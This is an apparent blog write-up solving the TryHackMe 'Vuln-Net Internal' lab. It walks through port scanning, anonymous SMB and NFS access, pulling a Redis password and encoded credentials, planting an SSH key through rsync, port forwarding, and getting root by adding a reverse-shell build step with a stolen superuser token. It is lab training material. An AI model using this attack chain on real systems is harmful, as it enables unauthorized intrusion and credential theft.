Vuln-Net Internal TryHackMe

Hello friends, Today I want talk about how to solve this room on Tryhackme.

let’s get started

Enumeration

First I’ll use Masscan it to scan the open ports on our target.

sudo masscan -p 1-65535 --interface tun0 --rate 1000 10.10.23.179

Okay, let’s use Nmap to scan these services.

sudo nmap -sV -sC -sS -p 2049,54515,445,139,111,42429,22,6379,33859,37729,873 -oA scan/result 10.10.23.179

SMB Service

We can log in as guest users in the Samba service let’s log in and see if we found anything.

smbclient -N -L //10.10.23.179
smbclient -N //10.10.23.179/shares

I’ll download files from these directories to see what is inside these files.

get name_file.txt # Download Files On VM Machine

I found the first flag let’s Deep Dig.

NFC Service

showmount -e $IP

let’s download this directory on the VM attacker.

mkdir mount
sudo mount -t nfs $IP:/opt/conf mount

After searching I found a configuration file for the Redis database, let’s see it.

cat redis.conf | grep -i "pass"

Great, I found the password let’s see what we can do with this password.

Redis

Now we have a password let’s log in to the Redis database to see what we can do.

redis-cli -h $IP -p 6379 -a  "B65Hx562*****" # login with the password
keys * # Returns all key names
get "internal flag" # Retrun value 
type name_keys # Returns the string representation of the type

lrange authlist 1 10000

Now we have something encoded let’s decode that.

echo "Value_encoded" | base64 -d

Okay, now we have these credentials let’s see what we can do.

Rsync service

Rsync is a Linux utility that can synchronize files and directories remotely or locally.

rsync -av --list-only rsync://10.10.52.162 # Listing a shared folder
rsync -av rsync://rsync-connect@10.10.52.162/files ./rsync # Copying files from a shared folder

Now we have a user flag, now we can upload authorized keys to connect via SSH.

ssh-kegen
rsync -ahv ./authorized_keys rsync://rsync-connect@10.10.52.162/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g 

Foothold

ssh -i id_ed25519 sys-internal@10.10.52.162

After some enumeration, I found this.

ss -ltnp

let’s forward traffic to our machine, After that, we can visit this website.

ssh -i id_ed25519 sys-internal@10.10.52.162 -L 631:127.0.0.1:631

After searching on this website I didn’t find anything interesting, After forwarding the traffic internal services to my machine I found this website.

ssh -i id_ed25519 sys-internal@10.10.52.162 -L 8111:127.0.0.1:8111

If you see the version you will find this website uses the old version let’s deep into our search.

I can access files on this website let’s search in files.

After reading this file I found a token superuser and I logged in with that token without a username, and then I could access the admin dashboard.

Now we have access as the superuser, and we need to create a new project > build configuration > build step and add a Python script for getting a reverse shell.

Now we are root.

Thanks for reading.